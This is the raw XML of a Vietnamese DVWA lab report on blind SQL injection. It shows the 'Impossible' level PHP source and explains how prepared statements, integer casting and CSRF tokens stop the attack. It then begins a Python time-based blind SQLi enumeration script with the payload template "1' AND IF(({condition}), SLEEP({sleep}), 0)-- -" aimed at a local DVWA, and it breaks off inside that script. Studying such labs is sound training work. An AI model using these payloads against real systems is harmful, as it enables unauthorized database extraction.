            <wp:docPr id="187199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0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3B0" w14:textId="5DD38555" w:rsidR="00B83B1A" w:rsidRDefault="00B83B1A" w:rsidP="004E4168">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Với SLEEP(8) web đã ngủ 8s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137E8AF5" w14:textId="1E46A9D2" w:rsidR="00B823ED" w:rsidRPr="00EB1F1B" w:rsidRDefault="00B823ED" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BCEF7DB" w14:textId="2276CA76" w:rsidR="006C2FCE" w:rsidRDefault="00CB2592" w:rsidP="006C2FCE">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>IV. Impossible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C4CB30" w14:textId="77777777" w:rsidR="00DE325F" w:rsidRDefault="00DE325F" w:rsidP="00DE325F">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Impossible SQL Injection (Blind) Source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB3D41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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DC668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5255F94C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if( isset( $_GET[ 'Submit' ] ) ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4749B18D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Check Anti-CSRF token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712D3900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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF0997A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$exists = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3CCD7E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7AA40B19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Get input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024AC45C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$id = $_GET[ 'id' ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095B9DB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1ABE5A57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// Was a number entered?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139C7272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if(is_numeric( $id )) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DF488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$id = intval ($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ED7130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switch ($_DVWA['SQLI_DB']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1C2B7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case MYSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BC0C5C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// Check the database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5332EBA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 = $db-&gt;prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638660E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$data-&gt;bindParam( ':id', $id, PDO::PARAM_INT );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35401020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$data-&gt;execute();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B77AC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1AEE3EB9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$exists = $data-&gt;rowCount();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E9009F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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C99D3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case SQLITE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A03AF0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global $sqlite_db_connection;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3801F6BC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3E635334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$stmt = $sqlite_db_connection-&gt;prepare('SELECT COUNT(first_name) AS numrows FROM users WHERE user_id = :id LIMIT 1;' );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037BC19E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$stmt-&gt;bindValue(':id',$id,SQLITE3_INTEGER);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBF881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 = $stmt-&gt;execute();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D3BA7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$result-&gt;finalize();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A502E2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if ($result !== false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256C4CA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There is no way to get the number of rows returned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C47CA0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This checks the number of columns (not rows) just</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEDF28B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as a precaution, but it won't stop someone dumping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157EB85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// multiple rows and viewing them one at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397255D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72540573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$num_columns = $result-&gt;numColumns();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C61FFA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if ($num_columns == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769921F3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$row = $result-&gt;fetchArray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB84C47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18533A4E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$numrows = $row[ 'numrows' ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF07536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    $exists = ($numrows == 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CD7F44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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00984E11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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF7870A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        break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C04728F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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ABBAEE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142F144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6D29BD22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7549BD4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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    // Get results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EF5DC8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if ($exists) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ED876B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1070CB79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exists in the database.&lt;/pre&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523A8BE4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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B159DBE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User wasn't found, so the page wasn't!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77515BC9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header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073B1F17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02246C9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// Feedback for end user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A663E96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    echo '&lt;pre&gt;User ID is MISSING from the database.&lt;/pre&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7BCBA6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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4070E6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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52382057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</w:p>
    <w:p w14:paraId="4E3D7BF3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// Generate Anti-CSRF token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C90B05" w14:textId="77777777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</w:pPr>
      <w:r>
        <w:t>generateSessionToken();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20789C69" w14:textId="5F4A8655" w:rsidR="00DE325F" w:rsidRDefault="00DE325F" w:rsidP="00DE325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7365D" w:themeFill="text2" w:themeFillShade="BF"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE325F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DA6ED4" w14:textId="77777777" w:rsidR="00DE325F" w:rsidRPr="00DE325F" w:rsidRDefault="00DE325F" w:rsidP="00DE325F"/>
    <w:p w14:paraId="375C896E" w14:textId="77777777" w:rsidR="00DE325F" w:rsidRPr="00DE325F" w:rsidRDefault="00DE325F" w:rsidP="00DE325F"/>
    <w:p w14:paraId="711B0636" w14:textId="77777777" w:rsidR="00DE325F" w:rsidRDefault="00DE325F" w:rsidP="00DE325F">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A8FCCF5" w14:textId="7534E49D" w:rsidR="00DE325F" w:rsidRDefault="00DE325F" w:rsidP="00DE325F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Level này </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE325F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">chống được Blind SQL Injection vì nó dùng đủ các biện pháp an toàn: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE325F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kiểm tra input là số</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE325F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE325F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ép kiểu integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE325F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE325F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dùng prepared statement</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE325F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE325F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bind parameter với kiểu dữ liệu rõ ràng</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE325F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, và </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE325F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kiểm tra CSRF token</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE325F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Do đó attacker không thể chèn các toán tử SQL như OR, AND, UNION, SLEEP() vào câu truy vấn. Trang vẫn có phản hồi đúng/sai, nhưng phản hồi đó không còn bị lợi dụng để khai thác Blind SQLi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28313D97" w14:textId="77777777" w:rsidR="00FA6CC9" w:rsidRDefault="00FA6CC9" w:rsidP="00FA6CC9">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="247A30A0" w14:textId="0A2BDF32" w:rsidR="00FA6CC9" w:rsidRDefault="00FA6CC9" w:rsidP="00FA6CC9">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Input bắt buộc phải là số: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA6CC9">
        <w:t>if(is_numeric( $id )) { $id = intval ($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D61644" w14:textId="3F66F64E" w:rsidR="00FA6CC9" w:rsidRDefault="00FA6CC9" w:rsidP="00FA6CC9">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA6CC9">
        <w:t>intval ($id)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sẽ ép về số, ví dụ input=’123abc’ sẽ còn ‘123’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2CE9DB" w14:textId="77777777" w:rsidR="00984A55" w:rsidRDefault="00984A55" w:rsidP="00FA6CC9">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB6723B" w14:textId="2019C5C5" w:rsidR="00984A55" w:rsidRDefault="00984A55" w:rsidP="00FA6CC9">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00984A55">
        <w:t>$data = $db-&gt;prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58869CFF" w14:textId="72D5AA6F" w:rsidR="00984A55" w:rsidRDefault="00984A55" w:rsidP="00FA6CC9">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Với placeholder :id : database chỉ hiểu là giá trị dữ liệu không phải 1 phần của câu lệnh SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1746F709" w14:textId="77777777" w:rsidR="00984A55" w:rsidRDefault="00984A55" w:rsidP="00FA6CC9">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="066553D3" w14:textId="784D82F1" w:rsidR="00984A55" w:rsidRDefault="00984A55" w:rsidP="00FA6CC9">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00984A55">
        <w:t>$data-&gt;bindParam( ':id', $id, PDO::PARAM_INT );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBD3488" w14:textId="48FDF00C" w:rsidR="00984A55" w:rsidRDefault="00984A55" w:rsidP="00FA6CC9">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Và bind dữ liệu đầu vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126123A7" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00FA6CC9">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51D4FD41" w14:textId="2267E37A" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>V. Python Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A801D25" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="1CDB4475" w14:textId="3599D9CD" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>-Cài đặt thư viện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CFDB46" w14:textId="1BC5E0B5" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB1F1B">
        <w:t>pip install requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDFB412" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52956E04" w14:textId="6A455FD1" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">-Tạo file </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB1F1B">
        <w:t>Python script lấy database, table, column</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A1578C" w14:textId="4FCA97B6" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB1F1B">
        <w:t>nano dvwa_blind_sleep_enum.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30522EDA" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="296A4A1C" w14:textId="0279C6AC" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>-Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55692975" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>import statistics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E684445" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410FF1F1" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>from typing import Optional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC19374" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="6C428801" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F68776A" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="75B9EA75" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="7864793F" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t># =========================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418C51B5" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t># CONFIG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F277547" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t># =========================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CB0D8A" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="73D364C9" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>URL = "http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCE6450" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="7BEB1D1D" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>COOKIES = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C8C964" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    "PHPSESSID": "PASTE_YOUR_PHPSESSID_HERE",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E2AB84" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    "security": "low",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDAA48B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE74E2C" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="16AEF17D" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>REQUEST_METHOD = "GET"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5072F37E" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="64F4139F" w14:textId="0A92B330" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>SLEEP_TIME = 5.0 #có thể thay sleep = 10.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A1955B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>TIMEOUT = 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEB6854" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="610E0EB2" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t># DVWA Low th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>ờng l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>à</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL dạng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7356ABA0" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t># WHERE user_id = '$id'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F031C66" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t># n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ê</w:t>
      </w:r>
      <w:r>
        <w:t>n payload cần dấu '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156557E3" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>INJECTION_TEMPLATE = "1' AND IF(({condition}), SLEEP({sleep}), 0)-- -"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE96957" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="747B328D" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>BASE_PARAMS = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354F467B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    "Submit": "Submit",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4FAEE1" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F4D18B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="2F17993D" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>ASCII_LOW = 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375E8789" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>ASCII_HIGH = 126</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40826C76" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="6687AE9A" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>session = requests.Session()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E422B93" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>session.cookies.update(COOKIES)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8E9A3E" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="38C00F78" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>threshold: Optional[float] = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1E4B5B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="143DB6F5" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="1EA080C4" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t># =========================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7895AE" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t># CORE REQUEST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4312E9B6" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t># =========================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479CB91E" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="6276911C" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>def timed_request(condition: str) -&gt; float:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A9B782" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF1FC58" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    Gửi 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>đ</w:t>
      </w:r>
      <w:r>
        <w:t>iều kiện SQL boolean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246AC191" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    Nếu condition </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>đú</w:t>
      </w:r>
      <w:r>
        <w:t>ng -&gt; DB sleep -&gt; response chậm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E90AC6C" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    Nếu condition sai -&gt; response nhanh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F336F6A" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
